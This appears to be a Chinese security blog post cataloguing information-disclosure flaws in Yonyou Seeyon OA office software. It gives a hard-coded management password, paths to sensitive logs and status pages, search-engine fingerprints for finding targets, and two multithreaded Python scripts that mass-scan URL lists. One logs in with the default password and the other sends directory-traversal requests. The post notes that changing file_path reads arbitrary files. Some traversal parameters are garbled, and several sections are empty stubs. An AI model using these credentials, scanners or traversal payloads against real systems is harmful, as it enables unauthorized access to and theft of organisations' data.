致远OA敏感信息泄露漏洞合集(含批量检测POC)

前言

用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台，涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容，支持企事业组织的信息化扩展应用，能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题，是组织管理的最佳实践。

产品系列: A3、A6、A8
品牌: 用友
对象: 微型、小型企业、企业部门级

敏感信息泄露

A6 status.jsp 信息泄露漏洞

漏洞描述

致远OA A8-m 存在状态监控页面信息泄露，攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击

漏洞影响

致远OA A8-m

网络测绘

title=“A8-m”

漏洞复现

访问监控页面

/seeyon/management/status.jsp
后台密码为 WLCCYBD@SEEYON
登录后通过如下url获得一些敏感信息

/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log

POC 批量检测

思路：python post发包登陆，头部location：会进行跳转以及状态码一般为302

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-18 11:14
@Author  : whgojp
@File    : POC.py

'''
import requests
from threading import Thread

THREAD_NUM = 10

password = 'WLCCYBD@SEEYON'

with open('urls.txt', 'r') as f:
    urls = [url.strip() for url in f.readlines()]


def check_url(url):
    if 'https' not in url:
        url = 'http://' + url
    try:
        # 发送POST请求
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': url + '/seeyon/management/index.jsp',
        }
        response = requests.post(url + '/seeyon/management/index.jsp', data={'password': password}, headers=headers,
                                 allow_redirects=False)
        # 判断是否登录成功
        if response.status_code == 302 and 'Location' in response.headers and response.headers['Location'].endswith(
                '/seeyon/management/status.jsp'):
            # 登录成功，输出URL
            print(url + ' is vulnerable')
            with open("result.txt", "a") as f:
                f.write(f"{url} is vulnerable.\n")
        else:
            # 登录失败
            pass
    except:
        # 出现异常
        pass

threads = []
for i in range(THREAD_NUM):
    thread_urls = urls[i::THREAD_NUM]
    thread = Thread(target=lambda urls: [check_url(url) for url in urls], args=(thread_urls,))
    threads.append(thread)

for thread in threads:
    thread.start()

for thread in threads:
    thread.join()

getSessionList.jsp Session泄漏漏洞

漏洞描述

通过使用存在漏洞的请求时，会回显部分用户的Session值，导致出现任意登录的情况

网络测绘

app=“致远互联-OA”

批量检测POC

致远OA 帆软组件 ReportServer 目录遍历漏洞

漏洞描述

致远OA 帆软组件 ReportServer接口存在目录遍历漏洞，攻击者通过漏洞可以获取服务器敏感信息

漏洞影响

致远OA 帆软组件

网络测绘

title=“致远A8-V5协同管理软件 V6.1sp1”

POC(批量检测)

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-20 16:53
@Author  : whgojp
@File    : POC.py
'''
import requests
import threading
def check_url(url, counter):
    if 'https' not in url:
        url = 'http://'+url
    try:
        url = url + '/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../¤tUserName=admin¤tUserId=1&isWebReport=true '
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            print(f"{url} is accessible.")
            with open("result.txt", "a") as f:
                f.write(f"{url} is accessible.\n")
        else:
            pass
    except requests.exceptions.RequestException as e:
        pass
    counter[0] += 1
    print(f"Scanning progress: {counter[0]}/{counter[1]}")
    
urls = []
with open("urls.txt", "r") as f:
    for line in f:
        urls.append(line.strip())
threads = []
counter = [0, len(urls)]
for url in urls:
    thread = threading.Thread(target=check_url, args=(url, counter))
    thread.start()
    threads.append(thread)
for thread in threads:
    thread.join()

如果要读取文件进行目录遍历，只需要更改file_path就行了

A6 createMysql.jsp 数据库敏感信息泄露漏洞

待续

A6 DownExcelBeanServlet 用户敏感信息漏洞

A6 initDataAssess.jsp 用户敏感信息漏洞

A6 config.jsp 敏感信息泄漏漏洞